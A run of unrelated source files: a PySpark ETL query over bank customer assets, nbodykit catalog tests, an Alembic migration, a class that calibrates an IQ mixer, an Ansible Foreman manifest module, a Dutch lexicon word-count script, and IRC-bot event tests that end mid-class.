 SELECT  CAST(A.CUST_ID AS VARCHAR(32))              AS CUST_ID 
		,CAST('' AS VARCHAR(20)) AS ORG_ID							--插入的空值，包顺龙2017/05/13
		,CAST('D002015' AS VARCHAR(20))               AS INDEX_CODE
		,CAST(SUM(TAKE_CGT_LINE) AS DECIMAL(22,2))                      AS INDEX_VALUE
       ,CAST(SUBSTR(V_DT, 1, 7)   AS VARCHAR(7))                    AS YEAR_MONTH 
        ,CAST(V_DT AS DATE)                   AS ETL_DATE 
        ,CAST(A.CUST_TYP AS VARCHAR(5))             AS CUST_TYPE 
       ,CAST(A.FR_ID AS  VARCHAR(5))              AS FR_ID 
        FROM ACRM_F_CI_ASSET_BUSI_PROTO A                           
  WHERE A.BAL > 0 
    AND A.LN_APCL_FLG           = 'N' 
    AND(A.PRODUCT_ID LIKE '1010%' 
             OR A.PRODUCT_ID LIKE '1030%' 
             OR A.PRODUCT_ID LIKE '1040%' 
             OR A.PRODUCT_ID LIKE '1050%' 
             OR A.PRODUCT_ID LIKE '1060%' 
             OR A.PRODUCT_ID LIKE '1070%' 
             OR A.PRODUCT_ID LIKE '2010%' 
             OR A.PRODUCT_ID LIKE '2020%' 
             OR A.PRODUCT_ID LIKE '2030%' 
             OR A.PRODUCT_ID LIKE '2040%' 
             OR A.PRODUCT_ID LIKE '2050%') 
  GROUP BY A.CUST_ID 
       ,A.CUST_TYP 
       ,A.FR_ID """

sql = re.sub(r"\bV_DT\b", "'"+V_DT10+"'", sql)
ACRM_A_TARGET_D002015 = sqlContext.sql(sql)
ACRM_A_TARGET_D002015.registerTempTable("ACRM_A_TARGET_D002015")
dfn="ACRM_A_TARGET_D002015/"+V_DT+".parquet"
ACRM_A_TARGET_D002015.cache()
nrows = ACRM_A_TARGET_D002015.count()
ACRM_A_TARGET_D002015.write.save(path=hdfs + '/' + dfn, mode='overwrite')
ACRM_A_TARGET_D002015.unpersist()
ACRM_F_CI_ASSET_BUSI_PROTO.unpersist()
ret = os.system("hdfs dfs -rm -r /"+dbname+"/ACRM_A_TARGET_D002015/"+V_DT_LD+".parquet")
et = datetime.now()
print("Step %d start[%s] end[%s] use %d seconds, insert ACRM_A_TARGET_D002015 lines %d") % (V_STEP, st.strftime("%H:%M:%S"), et.strftime("%H:%M:%S"), (et-st).seconds, nrows)

from runtests.mpi import MPITest
from nbodykit.lab import *
from nbodykit import setup_logging
from numpy.testing import assert_allclose
import tempfile
import os

@MPITest([1])
def test_hdf(comm):

    import h5py

    # fake structured array
    dset = numpy.empty(1024, dtype=[('Position', ('f8', 3)), ('Mass', 'f8')])
    dset['Position'] = numpy.random.random(size=(1024, 3))
    dset['Mass'] = numpy.random.random(size=1024)

    tmpfile = tempfile.mkstemp()[1]

    with h5py.File(tmpfile , 'w') as ff:
        ds = ff.create_dataset('X', data=dset) # store structured array as dataset
        ds.attrs['BoxSize'] = 1.0
        grp = ff.create_group('Y')
        grp.create_dataset('Position', data=dset['Position']) # column as dataset
        grp.create_dataset('Mass', data=dset['Mass']) # column as dataset

    cosmo = cosmology.Planck15

    source = HDFCatalog(tmpfile, dataset='X', attrs={"Nmesh":32}, comm=comm)
    assert_allclose(source['Position'], dset['Position'])

    region = source.query_range(32, 64)
    assert_allclose(region['Position'], dset['Position'][32:64])

    os.unlink(tmpfile)

@MPITest([1, 4])
def test_query_range(comm):

    import h5py

    # fake structured array
    dset = numpy.empty(1024, dtype=[('Position', ('f8', 3)), ('Mass', 'f8'), ('Index', 'i8')])
    dset['Index'] = numpy.arange(1024)
    dset['Position'] = numpy.random.random(size=(1024, 3))
    dset['Mass'] = numpy.random.random(size=1024)

    if comm.rank == 0:
        tmpfile = tempfile.mkstemp()[1]

        with h5py.File(tmpfile , 'w') as ff:
            ds = ff.create_dataset('X', data=dset) # store structured array as dataset
            ds.attrs['BoxSize'] = 1.0

        tmpfile = comm.bcast(tmpfile)
    else:
        tmpfile = comm.bcast(None)

    cosmo = cosmology.Planck15

    source = HDFCatalog(tmpfile, dataset='X', attrs={"Nmesh":32}, comm=comm)

    correct_region = source.gslice(32, 64)
    region = source.query_range(32, 64)

    assert_allclose(
        numpy.concatenate(comm.allgather(region['Index'].compute())), 
        numpy.arange(32, 64)
    )

    if comm.rank == 0:
        os.unlink(tmpfile)

@MPITest([1])
def test_csv(comm):

    with tempfile.NamedTemporaryFile() as ff:

        # generate data
        data = numpy.random.random(size=(100,5))
        numpy.savetxt(ff, data, fmt='%.7e'); ff.seek(0)

        # read nrows
        names =['a', 'b', 'c', 'd', 'e']
        f = CSVCatalog(ff.name, names, blocksize=100, comm=comm)

        # make sure data is the same
        for i, name in enumerate(names):
            numpy.testing.assert_almost_equal(data[:,i], f[name].compute(), decimal=7)

        # make sure all the columns are there
        assert all(col in f for col in names)

@MPITest([1])
def test_stack_glob(comm):

    tmpfile1 = 'test-glob-1.dat'
    tmpfile2 = 'test-glob-2.dat'

    # generate data
    data = numpy.random.random(size=(100,5))
    numpy.savetxt(tmpfile1, data, fmt='%.7e')
    numpy.savetxt(tmpfile2, data, fmt='%.7e')

    # read using a glob
    names =['a', 'b', 'c', 'd', 'e']
    f = CSVCatalog('test-glob-*', names, blocksize=100, comm=comm)

    # make sure print works
    print(f)

    # make sure data is the same
    fulldata = numpy.concatenate([data, data], axis=0)
    for i, name in enumerate(names):
        numpy.testing.assert_almost_equal(fulldata[:,i], f[name].compute(), decimal=7)

    # make sure all the columns are there
    assert all(col in f for col in names)

    os.unlink(tmpfile1)
    os.unlink(tmpfile2)

@MPITest([1])
def test_stack_list(comm):

    tmpfile1 = 'test-list-1.dat'
    tmpfile2 = 'test-list-2.dat'

    # generate data
    data = numpy.random.random(size=(100,5))
    numpy.savetxt(tmpfile1, data, fmt='%.7e')
    numpy.savetxt(tmpfile2, data, fmt='%.7e')

    # read using a glob
    names =['a', 'b', 'c', 'd', 'e']
    f = CSVCatalog(['test-list-1.dat', 'test-list-2.dat'], names, blocksize=100, comm=comm)

    # make sure print works
    print(f)

    # make sure data is the same
    fulldata = numpy.concatenate([data, data], axis=0)
    for i, name in enumerate(names):
        numpy.testing.assert_almost_equal(fulldata[:,i], f[name].compute(), decimal=7)

    # make sure all the columns are there
    assert all(col in f for col in names)

    os.unlink(tmpfile1)
    os.unlink(tmpfile2)

"""1.5 : Migrating work unity

Revision ID: 1212f113f03b
Revises: 1f07ae132ac8
Create Date: 2013-01-21 11:53:56.598914

"""

# revision identifiers, used by Alembic.
revision = '1212f113f03b'
down_revision = '1f07ae132ac8'

from alembic import op
import sqlalchemy as sa


UNITIES = dict(NONE="",
               HOUR=u"heure(s)",
               DAY=u"jour(s)",
               WEEK=u"semaine(s)",
               MONTH=u"mois",
               FEUIL=u"feuillet(s)",
               PACK=u"forfait")

UNITS = (u"heure(s)",
         u"jour(s)", u"semaine(s)", u"mois", u"forfait", u"feuillet(s)",)

def translate_unity(unity):
    return UNITIES.get(unity, UNITIES["NONE"])

def translate_inverse(unity):
    for key, value in UNITIES.items():
        if unity == value:
            return key
    else:
        return u"NONE"

def upgrade():
    from autonomie.models.task import WorkUnit
    from autonomie.models.task.estimation import EstimationLine
    from autonomie.models.task.invoice import InvoiceLine
    from autonomie.models.task.invoice import CancelInvoiceLine
    from autonomie_base.models.base import DBSESSION
    # Adding some characters to the Lines
    for table in "estimation_line", "invoice_line", "cancelinvoice_line":
        op.alter_column(table, "unity", type_=sa.String(100))

    for value in UNITS:
        unit = WorkUnit(label=value)
        DBSESSION().add(unit)
    for factory in (EstimationLine, InvoiceLine, CancelInvoiceLine):
        for line in factory.query():
            line.unity = translate_unity(line.unity)
            DBSESSION().merge(line)

def downgrade():
    from autonomie.models.task import WorkUnit
    from autonomie.models.task.estimation import EstimationLine
    from autonomie.models.task.invoice import InvoiceLine
    from autonomie.models.task.invoice import CancelInvoiceLine
    from autonomie_base.models.base import DBSESSION
    for factory in (EstimationLine, InvoiceLine, CancelInvoiceLine):
        for line in factory.query():
            line.unity = translate_inverse(line.unity)
            DBSESSION().merge(line)
    for value in WorkUnit.query():
        DBSESSION().delete(value)

from math import ceil

import numpy as np
from ipywidgets import widgets
from tqdm.notebook import tqdm
from matplotlib import pyplot as plt

import lib.iq_mixer_calibration
from drivers import IQAWG
from lib.data_management import load_IQMX_calibration_database, \
    save_IQMX_calibration
from lib.iq_mixer_calibration import IQCalibrator


class IQVectorGenerator:

    def __init__(self, name, lo, iq_awg: IQAWG, sa, calibration_db_name="IQVG",
                 default_calibration_power=-30, marker_period_divisor=None,
                 slave_iqvgs=None, calibration_step=10e6):
        """

        Parameters
        ----------
        lo
        iq_awg
        sa
        calibration_db_name
        default_calibration_power
        marker_period_divisor: int, ns
            by default, the marker period should be divisible by the if_period
            however, in some cases other divisor may be required, i.e. when
            m3202 is used with PXICLK10 trigger sync mode this divisor
            should be set to 100
        """
        self._name = name
        self._lo = lo
        self._iqawg = iq_awg
        self._sa = sa
        self._cal_db_name = calibration_db_name
        self._default_calibration_power = default_calibration_power
        self._calibration_widget = widgets.HTML()
        self._recalibrate_mixer = False
        self._frequency = 5e9
        self.set_if_frequency(100e6)
        if marker_period_divisor is not None:
            self._marker_period_divisor = marker_period_divisor
        else:
            self._marker_period_divisor = self._if_period
        # for marker period synchronization when iqvgs are on the same AWG
        self._slave_iqvgs = slave_iqvgs if slave_iqvgs is not None else []

        self._power = default_calibration_power
        self._dac_overridden = False
        self._current_cal = None
        self._requested_cal: lib.iq_mixer_calibration.IQCalibrationData = None
        self._cal_db = None

        self._marker_period = None
        self._requested_marker_period = None
        self.set_marker_period(1000)
        self._calibration_initial_guess = {"dc_offsets": np.random.uniform(.03, 0.1, size=2),
                                           "if_amplitudes": (.1, .1),
                                           "if_phase": -np.pi * 0.54}
        self._calibration_step = calibration_step
        self._calibration_test_data = []
        self._load_cal_db()

    def get_calibration_widget(self):
        return self._calibration_widget

    def set_parameters(self, parameters_dict):

        if "power" in parameters_dict:
            self.set_power(parameters_dict["power"])

        if "freq" in parameters_dict:
            self.set_frequency(parameters_dict["freq"])

        if "dac_overridden" in parameters_dict:
            self._dac_overridden = parameters_dict["dac_overridden"]
        else:
            self._dac_overridden = False

    def get_iqawg(self):
        self._iqawg.set_parameters(
            {'calibration': self._current_cal})  # ensure
        return self._iqawg

    def set_if_frequency(self, if_frequency):
        self._if_frequency = if_frequency
        self._if_period = 1 / if_frequency * 1e9  # ns

    def get_if_frequency(self):
        return self._if_frequency

    def set_output_state(self, state):
        self._lo.set_output_state(state)

    def set_frequency(self, freq):
        self._frequency = freq
        self._lo.set_frequency(self._frequency + self._if_frequency)
        self._requested_cal = self.get_calibration(self._frequency,
                                                   self._power)
        self._output_SSB()

    def set_power(self, power):
        if power > self._default_calibration_power + 10:
            raise ValueError("Power can be % dBm max, requested %d dBm" % (
                self._default_calibration_power + 10, power))

        self._power = power
        self._requested_cal = self.get_calibration(self._frequency,
                                                   self._power)
        self._lo.set_power(self._requested_cal.get_lo_power())
        self._output_SSB()

    def get_power(self):
        return self._power

    def set_marker_period(self, marker_period):
        '''
        For some applications there is need to control the length of the interval between triggers
        output by the AWG of the IQVectorGenerator.

        Parameters
        ----------
        marker_period: ns, float
            real trigger period will be recalculated to be not shorter than <marker_period> ns,
            but still divisible by the IF period
        '''
        self._requested_marker_period = marker_period
        correct_marker_period = ceil(
            marker_period / self._marker_period_divisor) * \
                                self._marker_period_divisor

        if correct_marker_period != self._marker_period:
            self._marker_period = correct_marker_period
            if self._requested_cal is not None:
                self._current_cal = None
                self._output_SSB()

        for slave_iqvg in self._slave_iqvgs:
            slave_iqvg.set_marker_period(self._marker_period)

    def _output_SSB(self):
        if self._requested_cal != self._current_cal:
            # print(f"IQVG {self._name}: outputting pulse sequence to update calibration for frequency: {self._frequency/1e9:.4f} GHz"
            #       f", power: {self._power} dBm.")
            self._iqawg.set_parameters({"calibration": self._requested_cal})
            pb = self._iqawg.get_pulse_builder()
            if_freq = self._requested_cal.get_radiation_parameters()[
                "if_frequency"]
            resolution = self._requested_cal.get_radiation_parameters()[
                "waveform_resolution"]
            if_period = 1 / if_freq * 1e9

            if (if_period * 1e9) % resolution != 0:
                print(
                    f"IQVectorGenerator {self._name} warning: IF period is not divisible by "
                    "calibration waveform resolution. Phase coherence will be bad.")

            seq = pb.add_sine_pulse(self._marker_period).build()
            self._iqawg.output_pulse_sequence(seq)

            self._current_cal = self._requested_cal
            # time.sleep(1)

    def _load_cal_db(self):
        self._cal_db = load_IQMX_calibration_database(self._cal_db_name, 0)

    def _around_frequency(self, frequency):
        # return ceil(frequency/self._calibration_step)*self._calibration_step
        return round(frequency / self._calibration_step) * self._calibration_step

    def get_calibration(self, frequency, power):
        frequency = self._around_frequency(frequency)
        # frequency = round(frequency/self._calibration_step)*self._calibration_step

        if self._cal_db is None:
            self._load_cal_db()

        cal = \
            self._cal_db.get(frozenset(dict(lo_power=14,
                                            ssb_power=self._default_calibration_power,
                                            lo_frequency=self._if_frequency + frequency,
                                            if_frequency=self._if_frequency,
                                            waveform_resolution=1,
                                            sideband_to_maintain='left').items()))
        if (cal is None) or self._recalibrate_mixer:
            calibrator = IQCalibrator(self._iqawg, self._sa, self._lo,
                                      self._cal_db_name, 0,
                                      sidebands_to_suppress=6,
                                      output_widget=self._calibration_widget)
            ig = self._calibration_initial_guess
            cal = calibrator.calibrate(
                lo_frequency=frequency + self._if_frequency,
                if_frequency=self._if_frequency,
                lo_power=14,
                ssb_power=self._default_calibration_power,
                waveform_resolution=1,
                iterations=3,
                minimize_iterlimit=100,
                sa_res_bandwidth=300,
                initial_guess=ig)
            save_IQMX_calibration(cal)

            self._load_cal_db()  # make sure to include new calibration into cache
            cal._ssb_power = power
            cal._if_amplitudes = cal._if_amplitudes / np.sqrt(
                10 ** ((self._default_calibration_power - power) / 10))
            # self._calibration_initial_guess["if_amplitudes"] = cal._if_amplitudes
            self._calibration_initial_guess["if_phase"] = cal._if_phase
            return cal
        else:
            cal = cal.copy()
            cal._if_amplitudes = cal._if_amplitudes / np.sqrt(
                10 ** ((self._default_calibration_power - power) / 10))
            return cal

    def calibrate_mixer(self, fstart, fstop, recalibrate=False):
        """
        Performs calibration of the mixer in a frequency range

        Parameters
        ----------
        fstart: float
            start of the frequency range
        fstop : float
            stop of the frequency range
        recalibrate : bool
            Whether or not to calibrate from scratch and override previous
            calibration in this interval.
        """
        fstart = self._around_frequency(fstart)
        fstop = self._around_frequency(fstop)
        self._recalibrate_mixer = recalibrate
        pb = tqdm(np.arange(fstart, fstop + self._calibration_step, self._calibration_step),
                  smoothing=0)
        for frequency in pb:
            pb.set_description("%.3f GHz" % (frequency / 1e9))

            for counter in range(3):
                try:
                    self.set_frequency(frequency)
                    break
                except ValueError:
                    print("Poor calibration at %.3f GHz, retry count "
                          "%d" % (frequency / 1e9, counter))
                    self._calibration_initial_guess["dc_offest"] = \
                        np.random.uniform(.03, 0.1, size=2)
        self._recalibrate_mixer = False

    def test_calibration(self, fstart, fstop, step=1e6,
                         sidebands_to_plot=[-1, 0, 1],
                         remeasure=False):
        """
        Tests the saved calibrations by monitoring all the sidebands throughout
        the specified frequency range
        Parameters
        ----------
        fstart: float, Hz
            start of the frequency range
        fstop: float, Hz
            stop of the frequency range
        step: float, Hz
            step of the scan
        remeasure : bool
            remeasure or just replot the data from the previous run
        """
        sideband_shifts = np.linspace(-3, 3, 7) * self._if_frequency
        freqs = np.arange(fstart, fstop + step, step)

        if remeasure or len(self._calibration_test_data) == 0:
            self._calibration_test_data = []
            for frequency in tqdm(freqs, smoothing=0):
                self.set_frequency(frequency)
                sa_freqs = sideband_shifts + self._frequency
                self._sa.setup_list_sweep(list(sa_freqs), [1000] * 3)
                self._sa.prepare_for_stb()
                self._sa.sweep_single()
                self._sa.wait_for_stb()
                self._calibration_test_data.append(self._sa.get_tracedata())
            self._calibration_test_data = np.array(
                self._calibration_test_data).T

        sidebands_to_plot_idcs = np.array(sidebands_to_plot, dtype=int) + 3
        sideband_shifts = sideband_shifts[sidebands_to_plot_idcs]
        data = self._calibration_test_data[sidebands_to_plot_idcs]
        for row, sideband_shift in zip(data, sideband_shifts):
            plt.plot(freqs, row, label=f"{(sideband_shift / 1e6):.2f} MHz")
        plt.legend()

        self._sa.setup_swept_sa(-self._if_frequency + self._frequency,
                                10 * self._if_frequency,
                                nop=1001, rbw=1e4)
        self._sa.set_continuous()

#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Andrew Kofink <ajkofink@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

from __future__ import absolute_import, division, print_function
__metaclass__ = type


DOCUMENTATION = '''
---
module: subscription_manifest
version_added: 1.0.0
short_description: Manage Subscription Manifests
description:
  - Upload, refresh and delete Subscription Manifests
author: "Andrew Kofink (@akofink)"
options:
  manifest_path:
    description:
      - Path to the manifest zip file
      - This parameter will be ignored if I(state=absent) or I(state=refreshed)
    type: path
  state:
    description:
      - The state of the manifest
    default: present
    choices:
      - absent
      - present
      - refreshed
    type: str
  repository_url:
    description:
       - URL to retrieve content from
    aliases: [ redhat_repository_url ]
    type: str
extends_documentation_fragment:
  - theforeman.foreman.foreman
  - theforeman.foreman.foreman.organization
'''

EXAMPLES = '''
- name: "Upload the RHEL developer edition manifest"
  theforeman.foreman.subscription_manifest:
    username: "admin"
    password: "changeme"
    server_url: "https://foreman.example.com"
    organization: "Default Organization"
    state: present
    manifest_path: "/tmp/manifest.zip"
'''

RETURN = ''' # '''

from ansible_collections.theforeman.foreman.plugins.module_utils.foreman_helper import KatelloEntityAnsibleModule


def main():
    module = KatelloEntityAnsibleModule(
        argument_spec=dict(
            manifest_path=dict(type='path'),
            state=dict(default='present', choices=['absent', 'present', 'refreshed']),
            repository_url=dict(aliases=['redhat_repository_url']),
        ),
        foreman_spec=dict(
            organization=dict(type='entity', required=True, thin=False),
        ),
        required_if=[
            ['state', 'present', ['manifest_path']],
        ],
        supports_check_mode=False,
    )

    module.task_timeout = 5 * 60

    with module.api_connection():
        organization = module.lookup_entity('organization')
        scope = module.scope_for('organization')

        try:
            existing_manifest = organization['owner_details']['upstreamConsumer']
        except KeyError:
            existing_manifest = None

        if module.state == 'present':
            if 'repository_url' in module.foreman_params:
                payload = {'redhat_repository_url': module.foreman_params['repository_url']}
                org_spec = dict(id=dict(), redhat_repository_url=dict())
                organization = module.ensure_entity('organizations', payload, organization, state='present', foreman_spec=org_spec)

            try:
                with open(module.foreman_params['manifest_path'], 'rb') as manifest_file:
                    files = {'content': (module.foreman_params['manifest_path'], manifest_file, 'application/zip')}
                    params = {}
                    if 'repository_url' in module.foreman_params:
                        params['repository_url'] = module.foreman_params['repository_url']
                    params.update(scope)
                    result = module.resource_action('subscriptions', 'upload', params, files=files, record_change=False, ignore_task_errors=True)
                    for error in result['humanized']['errors']:
                        if "same as existing data" in error:
                            # Nothing changed, but everything ok
                            break
                        if "older than existing data" in error:
                            module.fail_json(msg="Manifest is older than existing data.")
                        else:
                            module.fail_json(msg="Upload of the manifest failed: %s" % error)
                    else:
                        module.set_changed()
            except IOError as e:
                module.fail_json(msg="Unable to read the manifest file: %s" % e)
        elif module.desired_absent and existing_manifest:
            module.resource_action('subscriptions', 'delete_manifest', scope)
        elif module.state == 'refreshed':
            if existing_manifest:
                module.resource_action('subscriptions', 'refresh_manifest', scope)
            else:
                module.fail_json(msg="No manifest found to refresh.")


if __name__ == '__main__':
    main()

# coding: utf-8

# Copyright (C) 2017 Open Path View, Maison Du Libre
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.

# Contributors: Benjamin BERNARD <benjamin.bernard@openpathview.fr>
# Email: team@openpathview.fr
# Description: Camera Set Partition, represent a partition of ImagesSets.

from typing import NamedTuple, List
from opv_import.model import ImageSet

CameraSetPartition = NamedTuple(
    'CameraSetPartition',
    [
        ('ref_set', ImageSet),
        ('images_sets', List[ImageSet]),
        ('start_indexes', List[int]),
        ('fetcher_next_indexes', List[int]),
        ('break_reason', str),
        ('number_of_incomplete_sets', int),
        ('number_of_complete_sets', int),
        ('max_consecutive_incomplete_sets', int)
    ]
)

#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
add word counts to Cornetto lexical units database file

The word count file should have three columns, delimited by white space,
containing (1) the count, (2) the lemma, (3) the main POS tag.
The tagset is assumed to be the Spoken Dutch Corpus tagset,
and the character encoding must be ISO-8859-1.

The counts appear as the value of the feature "count" on <form> elements.
The updated lexical units xml database is written to standard output.

Since we have only the lemma and the POS, and no word sense, the frequency
information is added to each matching lexical unit regardless of its sense
(i.e. the value of the "c_seq_nr" attribute).
"""

# TODO:
# - deal with multiword counts


__author__ = 'Erwin Marsi <e.marsi@gmail.com>'
__version__ = '0.6'

from sys import stderr, stdout
from xml.etree.cElementTree import iterparse, SubElement, tostring, ElementTree

from cornetto.argparse import ArgumentParser, RawDescriptionHelpFormatter


def read_counts(file):
    if not hasattr(file, "read"):
        file = open(file)
        
    counts = {}
    totals = dict(noun=0, verb=0, adj=0, other=0)
    
    for l in file:
        try:
            count, form, tag = l.strip().split()
        except ValueError:
            stderr.write("Warning; ill-formed line: %s\n" % repr(l))
            continue
        
        # translate CGN tagset to word category
        if tag in ("N", "VNW", "TW", "SPEC"):
            cat = "noun"
        elif tag in ("WW"):
            cat = "verb"
        elif tag in ("ADJ", "BW"):
            cat = "adj"
        else:
            # LET LID TSW VG VZ
            cat = "other"
            
        # Cornetto word forms are stored in unicode
        form = form.decode("iso-8859-1")
        count = int(count)
        
        if form not in counts:
            counts[form] = dict(noun=0, verb=0, adj=0, other=0)
        
        counts[form][cat] += count
        totals[cat] += count
        
    return counts, totals



def add_count_attrib(counts, totals, cdb_lu_file):
    parser = iterparse(cdb_lu_file)
    
    for event, elem in parser:
        if elem.tag == "form":
            # following the ElementTree conventions, 
            # word form will be ascii or unicode
            form = elem.get("form-spelling")
            # lower case because Cornette is not consistent
            cat = elem.get("form-cat").lower()
            
            # fix category flaws in current release of Cornetto
            if cat == "adjective":
                cat = "adj"
            elif cat == "adverb":
                cat = "other"
            
            try:
                count = counts[form][cat]
            except KeyError:
                # form not found
                count = 0

            elem.set("count", str(count))
            
    # Finally, add totals, per category and overall,  to the doc root
    # Note that all words _not_ in Cornetto are not included in these totals 
    totals["all"] = sum(totals.values())
    
    for cat, count in totals.items():
        parser.root.set("count-total-%s" % cat, str(count))
        
    return ElementTree(parser.root)


parser = ArgumentParser(description=__doc__,
                        version="%(prog)s version " + __version__,
                        formatter_class=RawDescriptionHelpFormatter)

parser.add_argument("cdb_lu", type=file,
                    help="xml file containing the lexical units")

parser.add_argument("word_counts", type=file,
                    help="tabular file containing the word counts")

args = parser.parse_args()


counts, totals = read_counts(args.word_counts)

etree = add_count_attrib(counts, totals, args.cdb_lu)
    
etree.write(stdout, encoding="utf-8")


#def add_statistics_elem(counts, cdb_lu_file):

    #"""
    #adds a separate <statistics> element, 
    #which accomodates for other counts for other sources
    #"""
    #parser = iterparse(cdb_lu_file)
    
    #for event, elem in parser:
        #if elem.tag == "cdb_lu":
            #try:
                #count = counts[form][cat]
            #except KeyError:
                #count = 0
            
            #freq_el = SubElement(elem, "statistics")
            #SubElement(freq_el, "count", scr="uvt").text = str(count)
            
        #elif elem.tag == "form":
            ## following the ElementTree conventions, 
            ## word form will be ascii or unicode
            #form = elem.get("form-spelling")
            #cat = elem.get("form-cat")
            
    #return ElementTree(parser.root)

# Copyright © 2016  Lars Peter Søndergaard <lps@chireiden.net>
# Copyright © 2016  FichteFoll <fichtefoll2@googlemail.com>
#
# This file is part of Shanghai, an asynchronous multi-server IRC bot.
#
# Shanghai is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shanghai is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Shanghai.  If not, see <http://www.gnu.org/licenses/>.

import asyncio
from unittest import mock

import pytest

from shanghai import event
from shanghai.logging import Logger, get_logger, LogLevels

# use this when debug log output is desired
debug_logger = get_logger('logging', 'debug')
debug_logger.setLevel(LogLevels.DDEBUG)


@pytest.fixture
def loop():
    return asyncio.get_event_loop()


@pytest.fixture
def evt():
    return event.build_event("event")


# base class to subclass for an actual plugin
class BasePlugin:
    pass


@pytest.fixture
def sample_plugin():
    class TestPlugin(BasePlugin):
        @event.event
        def on_test(self):
            pass

    return TestPlugin


class TestPriority:

    def test_type(self):
        assert isinstance(event.Priority.DEFAULT, int)

    def test_order(self):
        assert (event.Priority.PRE_CORE
                > event.Priority.CORE
                > event.Priority.POST_CORE
                > event.Priority.PRE_DEFAULT
                > event.Priority.DEFAULT
                > event.Priority.POST_DEFAULT)

    def test_lookup(self):
        assert event.Priority.lookup(event.Priority.CORE) is event.Priority.CORE
        assert event.Priority.lookup(event.Priority.CORE.value) is event.Priority.CORE
        assert event.Priority.lookup(-12312412) == -12312412


class TestEvent:

    def test_build_event(self):
        evt = event.build_event("evt_name", arg1="val1", arg2=None)
        assert evt.name == "evt_name"
        assert evt.args == {'arg1': "val1", 'arg2': None}


class TestPrioritizedSetList:

    def test_bool(self):
        prio_set_list = event._PrioritizedSetList()

        assert bool(prio_set_list) is False

        prio_set_list.add(0, None)
        assert bool(prio_set_list) is True

    def test_add(self):
        prio_set_list = event._PrioritizedSetList()
        objs = [(i,) for i in range(5)]

        prio_set_list.add(0, objs[0])
        assert prio_set_list.list == [(0, {objs[0]})]

        prio_set_list.add(0, objs[1])
        assert prio_set_list.list == [(0, {objs[0], objs[1]})]

        prio_set_list.add(10, objs[2])
        assert prio_set_list.list == [(10, {objs[2]}),
                                      (0,  {objs[0], objs[1]})]

        prio_set_list.add(-10, objs[3])
        assert prio_set_list.list == [( 10, {objs[2]}),           # noqa: E201
                                      (  0, {objs[0], objs[1]}),  # noqa: E201
                                      (-10, {objs[3]})]
        prio_set_list.add(-1, objs[4])
        assert prio_set_list.list == [( 10, {objs[2]}),           # noqa: E201
                                      (  0, {objs[0], objs[1]}),  # noqa: E201
                                      ( -1, {objs[4]}),           # noqa: E201
                                      (-10, {objs[3]})]

    def test_add_already_added(self):
        prio_set_list = event._PrioritizedSetList()
        obj = object()
        prio_set_list.add(0, obj)

        with pytest.raises(ValueError) as excinfo:
            prio_set_list.add(0, obj)
        excinfo.match(r"has already been added")

        with pytest.raises(ValueError) as excinfo:
            prio_set_list.add(1, obj)
        excinfo.match(r"has already been added")

    def test_contains(self):
        prio_set_list = event._PrioritizedSetList()
        obj = object()

        prio_set_list.add(0, obj)
        assert obj in prio_set_list

    def test_iter(self):
        prio_set_list = event._PrioritizedSetList()
        objs = [(i,) for i in range(5)]
        for i, obj in enumerate(objs):
            prio_set_list.add(-i, obj)

        for i, set_ in enumerate(prio_set_list):
            assert set_ == (-i, {objs[i]})

    def test_remove(self):
        prio_set_list = event._PrioritizedSetList()
        obj = (1,)

        prio_set_list.add(1, obj)
        assert prio_set_list
        prio_set_list.remove(obj)
        assert not prio_set_list

        with pytest.raises(ValueError) as excinfo:
            prio_set_list.remove(obj)
        excinfo.match(r"can not be found")


# Skipping HandlerInfo tests
# since that is only to be used with the `event` decorator anyway.
class TestEventDecorator:

    def test_no_param_usage(self):
        @event.event
        def func_name(self):
            pass

        @event.event
        def on_test(self):
            pass

        assert hasattr(on_test, '_h_info')
        h_info = on_test._h_info
        assert h_info.event_name == "test"
        assert func_name._h_info.event_name == "func_name"
        assert h_info.handler is on_test
        assert h_info.priority is event.Priority.DEFAULT
        assert h_info.should_enable
        assert not h_info.is_async

    def test_param_usage(self):
        @event.event('evt_test', priority=-12, enable=False)
        def on_test(self):
            pass

        assert hasattr(on_test, '_h_info')
        h_info = on_test._h_info
        assert h_info.event_name == 'evt_test'
        assert h_info.handler is on_test
        assert h_info.priority == -12
        assert not h_info.should_enable
        assert not h_info.is_async

    def test_async_handler(self):
        @event.event(enable=False)
        async def on_async_test(self):
            pass

        assert hasattr(on_async_test, '_h_info')
        h_info = on_async_test._h_info
        assert h_info.event_name == 'async_test'
        assert h_info.handler is on_async_test
        assert h_info.priority is event.Priority.DEFAULT
        assert not h_info.should_enable
        assert h_info.is_async

    def test_prefix(self):
        import functools
        other_event_deco = functools.partial(event.event, _prefix="__test_")

        @other_event_deco
        def on_test(self):
            pass

        assert hasattr(on_test, '_h_info')
        h_info = on_test._h_info
        assert h_info.event_name == '__test_test'

    def test_core_event_deco(self):
        @event.core_event
        def on_test(self):
            pass

        assert hasattr(on_test, '_h_info')
        h_info = on_test._h_info
        assert h_info.priority is event.Priority.CORE

    def test_non_callable(self):
        with pytest.raises(TypeError) as excinfo:
            event.event(123)
        excinfo.match(r"Expected string, callable or None as first argument")

        with pytest.raises(TypeError) as excinfo:
            event.event("name")([])
        excinfo.match(r"Callable must be a function \(`def`\)"
                      r" or coroutine function \(`async def`\)")


class TestHandlerInstance:

